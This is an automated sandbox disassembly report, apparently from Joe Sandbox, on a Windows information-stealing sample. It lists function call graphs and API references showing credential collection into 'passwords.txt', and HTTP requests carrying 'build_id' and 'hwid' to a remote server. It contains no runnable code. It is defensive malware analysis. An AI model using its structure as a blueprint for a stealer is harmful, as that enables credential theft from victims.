                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BA4,?,?,?,00425B9E,?,00000000), ref: 0040C378
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                • lstrcat.KERNEL32(00000000,00425BA8), ref: 0040C4A7
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                • lstrcat.KERNEL32(00000000,00425BAC), ref: 0040C4C7
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                • lstrcat.KERNEL32(00000000,00425BB0), ref: 0040C4F6
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                • lstrcat.KERNEL32(00000000,00425BB4), ref: 0040C525
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                • lstrcat.KERNEL32(00000000,00425BB8), ref: 0040C554
                                                                                • lstrcat.KERNEL32(00000000,00425BBC), ref: 0040C562
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                • memset.MSVCRT ref: 0040C5E9
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                • String ID: passwords.txt
                                                                                • API String ID: 3298853120-347816968
                                                                                • Opcode ID: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                • Instruction ID: 3d2456610e152fb8fa5d54acb3feaddce6e398d7491f6e002fa618601dbd43d1
                                                                                • Opcode Fuzzy Hash: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                • Instruction Fuzzy Hash: 00C16971800159EEDB15EBE4DD1AEEEBB75BF18304F10407AF512B21E1DB782A09DB25
                                                                                Function 0041390C Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 825sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2048 41390c-4139c5 _EH_prolog call 4135ac call 40f997 * 3 call 40f923 * 6 2069 4139c9-4139d0 call 402283 2048->2069 2072 413a64-413ae5 call 4020f9 call 402113 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2069->2072 2073 4139d6-413a5f call 4020f9 call 40f9e1 call 40f98e call 40212d call 40f95a call 4010b1 call 41303a call 40f9e1 2069->2073 2103 413b50-413b66 call 40fb4d StrCmpCA 2072->2103 2104 413ae7-413b29 call 40212d call 40f95a call 4010b1 call 41303a 2072->2104 2109 413b47-413b4b call 40f98e 2073->2109 2112 41435b-4143ba call 40f9e1 call 40212d call 40f9e1 call 40f98e call 402286 call 40f9e1 call 40f98e call 4132d9 2103->2112 2113 413b6c-413b73 call 40227f 2103->2113 2132 413b2e-413b41 call 40f9e1 2104->2132 2109->2103 2201 4143bf-414436 call 40f98e * 6 call 413295 call 401061 2112->2201 2122 413b79-413b80 call 402283 2113->2122 2123 413cfd-413d13 call 40fb4d StrCmpCA 2113->2123 2134 413c11-413c92 call 402147 call 402161 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2122->2134 2135 413b86-413c0c call 402147 call 40f9e1 call 40f98e call 40217b call 402147 call 4010b1 call 41303a call 40f9e1 2122->2135 2136 414316-414356 call 40f9e1 call 40217b call 40f9e1 call 40f98e call 4022a0 2123->2136 2137 413d19-413d20 call 402283 2123->2137 2132->2109 2134->2123 2262 413c94-413cee call 40217b call 40f95a call 4010b1 call 41303a call 40f9e1 2134->2262 2278 413cf4-413cf8 call 40f98e 2135->2278 2210 414266-41428a call 40f9e1 call 40f98e call 4132d9 2136->2210 2153 413d26-413d2d call 402283 2137->2153 2154 413eaa-413ec0 call 40fb4d StrCmpCA 2137->2154 2169 413d33-413db9 call 402195 call 40f9e1 call 40f98e call 4021c9 call 402195 call 4010b1 call 41303a call 40f9e1 2153->2169 2170 413dbe-413e3f call 402195 call 4021af call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2153->2170 2171 4142d1-414311 call 40f9e1 call 4021c9 call 40f9e1 call 40f98e call 4022ba 2154->2171 2172 413ec6-413ecd call 402283 2154->2172 2339 413ea1-413ea5 call 40f98e 2169->2339 2170->2154 2322 413e41-413e9b call 4021c9 call 40f95a call 4010b1 call 41303a call 40f9e1 2170->2322 2171->2210 2194 413ed3-413eda call 402283 2172->2194 2195 414057-41406d call 40fb4d StrCmpCA 2172->2195 2223 413ee0-413f66 call 4021e3 call 40f9e1 call 40f98e call 402217 call 4021e3 call 4010b1 call 41303a call 40f9e1 2194->2223 2224 413f6b-413fec call 4021e3 call 4021fd call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2194->2224 2225 414073-41407a call 402283 2195->2225 2226 41428f-4142cf call 40f9e1 call 402217 call 40f9e1 call 40f98e call 4022d4 2195->2226 2210->2201 2384 41404e-414052 call 40f98e 2223->2384 2224->2195 2376 413fee-414048 call 402217 call 40f95a call 4010b1 call 41303a call 40f9e1 2224->2376 2258 414080-414087 call 402283 2225->2258 2259 4141fe-414214 call 40fb4d StrCmpCA 2225->2259 2226->2210 2292 414118-414199 call 402231 call 40224b call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2258->2292 2293 41408d-414113 call 402231 call 40f9e1 call 40f98e call 402265 call 402231 call 4010b1 call 41303a call 40f9e1 2258->2293 2294 414226-414262 call 40f9e1 call 402265 call 40f9e1 call 40f98e call 4022ee 2259->2294 2295 414216-414221 Sleep 2259->2295 2262->2278 2278->2123 2292->2259 2402 41419b-4141f2 call 402265 call 40f95a call 4010b1 call 41303a call 40f9e1 2292->2402 2407 4141f5-4141f9 call 40f98e 2293->2407 2294->2210 2295->2069 2322->2339 2339->2154 2376->2384 2384->2195 2402->2407 2407->2259
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00413911
                                                                                  • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                                  • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                                • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                                  • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                                  • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                  • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                  • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                  • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                  • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                • API String ID: 1345713276-3681523784
                                                                                • Opcode ID: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                • Instruction ID: 81b84598b74079d87ef3f85c7997e73a576bc14dc27035db183a239247f2f400
                                                                                • Opcode Fuzzy Hash: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                • Instruction Fuzzy Hash: D5626370904248EADB10EBE5C956BDEBBB89F19308F5041BEF445B32C1DB785B4C8B66
                                                                                Function 00403AF5 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513networkstringfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2421 403af5-403bc4 _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 2438 403bc6 2421->2438 2439 403bc8-403bcb 2421->2439 2438->2439 2440 403bd1-403d4f call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 2439->2440 2441 404122-4041b1 InternetCloseHandle call 410a94 * 2 call 40f98e * 8 2439->2441 2440->2441 2512 403d55-403d88 HttpOpenRequestA 2440->2512 2513 404119-40411c InternetCloseHandle 2512->2513 2514 403d8e-403d90 2512->2514 2513->2441 2515 403d92-403da2 InternetSetOptionA 2514->2515 2516 403da8-4040b3 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40f923 call 40fa28 * 2 call 40f9e1 call 40f98e * 2 call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA call 40fb4d HttpSendRequestA 2514->2516 2515->2516 2627 4040ef-404104 InternetReadFile 2516->2627 2628 4040b5-4040ba 2627->2628 2629 404106-404114 InternetCloseHandle call 40f98e 2627->2629 2628->2629 2631 4040bc-4040ea call 40fa9c call 40f9e1 call 40f98e 2628->2631 2629->2513 2631->2627
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00403AFA
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004259CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                                • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                                • InternetCloseHandle.WININET(?), ref: 00404125
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                • API String ID: 1139859944-3346224549
                                                                                • Opcode ID: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
                                                                                • Instruction ID: 7cb0d70ecfea339ca3c9d0d40474d85fcafec7ec4a7ae7ad7b1869ac4000fa9b
                                                                                • Opcode Fuzzy Hash: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
                                                                                • Instruction Fuzzy Hash: 36223BB190424CEADB11EBE4C956BEEBBB8AF18308F50417EE50573582DE781B4CCB65
                                                                                Function 00406737 Relevance: 33.5, APIs: 22, Instructions: 511stringmemoryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2741 406737-406760 _EH_prolog call 40fb28 2744 406762-40676a 2741->2744 2745 40676c-40677f call 40fb28 2741->2745 2746 40678a call 40f997 2744->2746 2750 406785 2745->2750 2751 406847-406854 call 40fb28 2745->2751 2752 40678f-406845 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 2746->2752 2750->2746 2751->2752 2758 40685a-406876 call 40f98e * 2 2751->2758 2789 406894-4068b0 call 40fb4d * 2 CopyFileA 2752->2789 2767 406e08-406e29 call 40f98e call 401061 2758->2767 2794 4068b2-4068dd call 40f923 call 40fa9c 2789->2794 2795 40687b-406891 call 40f95a call 411056 2789->2795 2804 4068e3-406971 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 2794->2804 2805 406976-406a4a call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40fa9c call 40f9e1 call 40f98e 2794->2805 2795->2789 2846 406a4d-406a6d call 40f98e call 40fb4d 2804->2846 2805->2846 2860 406a73-406a8e 2846->2860 2861 406db6-406dc8 call 40fb4d DeleteFileA call 40fb14 2846->2861 2867 406da2-406db5 2860->2867 2868 406a94-406aaa GetProcessHeap RtlAllocateHeap 2860->2868 2871 406dcd-406e05 call 40fb14 call 40f98e * 4 2861->2871 2867->2861 2870 406d1e-406d2b 2868->2870 2877 406d31-406d3d lstrlenA 2870->2877 2878 406aaf-406b5c call 40f923 * 6 call 40fb28 2870->2878 2871->2767 2880 406d93-406d9f memset 2877->2880 2881 406d3f-406d7d lstrlenA call 40f95a call 4010b1 call 414437 2877->2881 2916 406b66 2878->2916 2917 406b5e-406b64 2878->2917 2880->2867 2897 406d82-406d8e call 40f98e 2881->2897 2897->2880 2918 406b6c-406b83 call 40f997 call 40fb28 2916->2918 2917->2918 2923 406b85-406b8b 2918->2923 2924 406b8d 2918->2924 2925 406b93-406ba4 call 40f997 call 40fb41 2923->2925 2924->2925 2930 406bb3-406d19 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 2 call 4063b1 call 40fb4d lstrcat call 40f98e lstrcat call 40f98e * 6 2925->2930 2931 406ba6-406bae call 40f997 2925->2931 2930->2870 2931->2930
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040673C
                                                                                  • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425DD4,00000000), ref: 0040FB31
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BD0,?,?,?,00425BA6,?,00000000), ref: 004068A8
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                                  • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                                  • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                  • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                  • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                                • lstrcat.KERNEL32(00000000,00425BEC), ref: 00406BCD
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                                • lstrcat.KERNEL32(00000000,00425BF0), ref: 00406BED
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • memset.MSVCRT ref: 00406D9A
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 4187064601-0
                                                                                • Opcode ID: ea3e131a31bfade24d911b2f4923d0140332d684978b2b21ba3cf0083f7bbf7d
                                                                                • Instruction ID: 623c21351db5d7502ddbdcae5b6d8d47bff6a1d16c2b78033439981e25a1e23c
                                                                                • Opcode Fuzzy Hash: ea3e131a31bfade24d911b2f4923d0140332d684978b2b21ba3cf0083f7bbf7d
                                                                                • Instruction Fuzzy Hash: 3F224871904248EADF15EBE4DD56AEEBB75AF18308F50407EF402721D2DF782A09DB26
                                                                                Function 00408759 Relevance: 33.4, APIs: 22, Instructions: 407stringmemoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040875E
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
